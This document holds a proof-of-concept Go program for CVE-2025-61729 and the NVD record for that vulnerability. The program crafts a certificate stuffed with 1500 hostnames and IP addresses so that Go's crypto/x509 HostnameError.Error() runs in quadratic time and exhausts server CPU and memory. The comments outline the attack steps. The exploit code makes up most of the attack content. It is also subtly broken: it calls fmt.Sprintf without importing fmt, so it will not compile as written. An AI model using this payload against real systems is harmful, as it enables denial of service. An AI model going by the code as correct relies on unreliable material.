CVE-2025-61729

// CVE-2025-61729 PoC - Malicious Certificate Resource Exhaustion // This PoC demonstrates generating a certificate with excessive hostnames // to trigger quadratic runtime in HostnameError.Error() package main import ( "crypto/rand" "crypto/rsa" "crypto/x509" "crypto/x509/pkix" "encoding/pem" "math/big" "net" "time" ) func generateMaliciousCertificate() { // Generate RSA private key privateKey, err := rsa.GenerateKey(rand.Reader, 2048) if err != nil { panic(err) } // Create a certificate with excessive hostnames (1000+) // This will cause quadratic runtime when Error() is called var largeIPAddresses []net.IP var largeDNSNames []string // Generate 1500 hostnames to trigger resource exhaustion for i := 0; i < 1500; i++ { largeDNSNames = append(largeDNSNames, fmt.Sprintf("malicious-hostname-%d.example.com", i)) largeIPAddresses = append(largeIPAddresses, net.ParseIP(fmt.Sprintf("192.168.%d.%d", i/256, i%256))) } template := x509.Certificate{ SerialNumber: big.NewInt(1), Subject: pkix.Name{ Organization: []string{"Malicious Org"}, }, NotBefore: time.Now(), NotAfter: time.Now().Add(365 * 24 * time.Hour), KeyUsage: x509.KeyUsageKeyEncipherment | x509.KeyUsageDigitalSignature, ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth}, DNSNames: largeDNSNames, IPAddresses: largeIPAddresses, } certDER, err := x509.CreateCertificate(rand.Reader, &template, &template, &privateKey.PublicKey, privateKey) if err != nil { panic(err) } certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: certDER}) println(string(certPEM)) } func main() { generateMaliciousCertificate() } // Attack simulation - how the vulnerability is triggered: // 1. Attacker crafts a certificate with 1500+ hostnames // 2. Server receives the malicious certificate // 3. crypto/x509 validates the certificate // 4. HostnameError.Error() is called with no limit // 5. String concatenation causes O(n²) runtime // 6. Server experiences high CPU/memory consumption

{"cve": {"id": "CVE-2025-61729", "sourceIdentifier": "[email protected]", "published": "2025-12-02T19:15:51.447", "lastModified": "2025-12-19T18:25:28.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Within HostnameError.Error(), when constructing an error string, there is no limit to the number of hosts that will be printed out. Furthermore, the error string is constructed by repeated string concatenation, leading to quadratic runtime. Therefore, a certificate provided by a malicious actor can result in excessive resource consumption."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.24.11", "matchCriteriaId": "F2E6FD2A-A487-4099-B91D-2429F286AC6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:golang:go:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.25.0", "versionEndExcluding": "1.25.5", "matchCriteriaId": "39C03A37-B94B-46E4-B1C2-A70A870F8E53"}]}]}], "references": [{"url": "https://go.dev/cl/725920", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://go.dev/issue/76445", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4", "source": "[email protected]", "tags": ["Mailing List", "Release Notes"]}, {"url": "https://pkg.go.dev/vuln/GO-2025-4155", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}